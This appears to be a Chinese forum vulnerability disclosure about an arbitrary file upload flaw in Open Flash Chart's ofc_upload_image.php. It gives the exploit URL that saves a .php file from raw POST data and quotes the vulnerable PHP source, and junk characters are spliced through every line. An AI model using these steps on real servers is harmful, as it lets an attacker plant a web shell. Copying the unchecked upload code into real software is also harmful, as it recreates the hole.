POST 数据漏洞文件执行任意后缀文件保存
8 ^0 n& |9 b3 @6 i" m; j7 n4 B 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
* X }# s% H" X& H: [0 w' @) {& k6 s/ j0 W* d; Y8 p
利用:
. M# F0 z3 O' \1 M/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
( A1 Y" b' g1 @ j( L. n1 b
5 }! n- `2 _: _) x- r2 _" Z) d. ePost任意数据/ c2 Y5 `8 z; ?! `6 p$ a& h" w
保存位置http://localhost/chart/tmp-upload-images/hfy.php9 L8 M7 U* U E
% n' \4 b9 Z+ ?3 N
' a7 z( ` s) A, }! g- @/ L3 W最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
& O( \7 L- p0 k' n/ y) M9 R0 i; t4 M5 B: l
<?php7 o+ I3 _+ k4 X9 {1 M
: u- Z# K: E7 @& I; z+ L
//4 `; T5 n: f- m
// In Open Flash Chart -> save_image debug mode, you0 m/ Y' ]# n' m$ E
// will see the 'echo' text in a new window.
9 ]! ~0 d) I: D8 q( D# m//
+ Z! r5 J; K4 x6 B1 R5 |
- q; x+ L! w& |6 d# f; R( q- j9 ~/*
: G7 x( {' {' M* a, r6 k% C( ~; T' Y; p- Q; c& ?% D( c9 G
print_r( $_GET );
+ h0 x+ w; r, W" Aprint_r( $_POST );
* N% T' t' e. ?. Oprint_r( $_FILES );
6 q6 x* Y% R2 N% v# \8 |* B1 z5 E" z1 d l$ j6 J8 q
print_r( $GLOBALS );0 ^% @8 U+ c5 s3 W+ g" E
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );2 K; ]' r! r' P: g) y4 W' F r* J) _
" g4 }/ m# m7 n- n/ R! g
*/* Y% `" U7 E7 e9 r* f) O
// default path for the image to be stored //5 u0 d( k1 J9 Y) `. x1 R* ]$ M {
$default_path = '../tmp-upload-images/';
& Y4 a7 a k6 B7 X- m* Z
' {% A8 [8 O: T' Y5 U* V/ Zif (!file_exists($default_path)) mkdir($default_path, 0777, true);$ e/ N+ h1 @* M, U
; t5 {- L* q; O# F1 M( l" f, u// full path to the saved image including filename //
( p$ V/ _0 Y6 w7 q$destination = $default_path . basename( $_GET[ 'name' ] ); 7 b$ q% {* e9 D& }
+ L4 I) S1 h: l+ j% ?! |
echo 'Saving your image to: '. $destination;4 R8 `& W( G# w5 c% M( Q- h
// print_r( $_POST );0 }" @) r! |$ f# g+ a
// print_r( $_SERVER );2 W: I B; i+ _7 x
// echo $HTTP_RAW_POST_DATA;. X" O6 I4 P0 v2 F& w7 }& q
J$ w: \0 y( @' L$ l//
1 k3 q8 Q C5 f! R, V0 h// POST data is usually string data, but we are passing a RAW .png
4 P; r0 v, Y! T& N2 C- s// so PHP is a bit confused and $_POST is empty. But it has saved
$ G2 v; w- G+ u; H// the raw bits into $HTTP_RAW_POST_DATA" g6 f" ~5 |+ U4 x
//
) e# M6 m# \- F, g5 I- N
7 ^# j4 [7 w; ]- z C$jfh = fopen($destination, 'w') or die("can't open file");5 z7 P G7 i; U1 i+ D$ w/ W/ d
fwrite($jfh, $HTTP_RAW_POST_DATA);: b& e3 y1 ?/ Z
fclose($jfh);) H& [3 Y6 S& g: H
* ~) z3 H4 y" ^ u; F8 J" v
//
& I5 T3 K3 q5 m5 K! F; Y& h// LOOK:
: w! E C, D* p" U2 v+ ~//
5 G. W3 j- l7 C. _, t% ]exit();' a2 S6 N$ G% C* w
//4 K7 d3 i, w/ w& w8 j7 K
// PHP5:3 c" a& P" ~4 o8 y; G Q5 U' }
//
0 T6 j, g7 N, v: c4 J1 }- {) L j, V0 ?
" F, R# }5 L6 u9 y" R6 }7 r
// default path for the image to be stored //
/ R; L+ Y" P: ]# W7 y8 t$default_path = 'tmp-upload-images/';
' Y0 c/ ~; P% Y- t% Y
& J" @/ s6 N& a( O4 E1 K7 B. Iif (!file_exists($default_path)) mkdir($default_path, 0777, true);/ W7 X, X6 @, _& t9 v, o
: K2 L9 Z% P3 n' t* t1 h
// full path to the saved image including filename //
$ W4 w" _+ d3 S9 Y4 ~( a$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
) e& k1 r) t C/ v% x2 q' j k2 A# g& C, `4 }
// move the image into the specified directory //- A1 w; p! |% W( s" N3 {
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {' u4 I) z2 _. m! i# v- g
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
$ J0 }; V9 N5 X* y7 R O; U} else {
7 q0 B! } T& P! f( O echo "FILE UPLOAD FAILED";
( e5 U6 l# C; y! v6 g. ], |}3 @( S) b; K/ j( t
5 Z: F) i* M& p9 ~# c4 J
& m7 c; i* |4 v! f" M! J
?>& w3 R3 v' a/ O. g9 n; u6 O
# z2 C: E" v3 Y1 s( B
* ?) D/ Q7 _3 I
' s% H1 c2 N. ]
9 l) h9 g, b- @- F8 E) P$ s+ B" V* E' y# w' l
. ?! Y% h t1 \
修复方案: - M D: q& N D) e/ f
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
7 ]5 n& ~* x$ N' N# W& q' P/ u. p2 J9 Y2 L) V2 a
* K# B" |1 I% X4 W* n7 G# p1 F$ H0 U, e0 ]
0 R2 f D2 l2 t( C7 @ |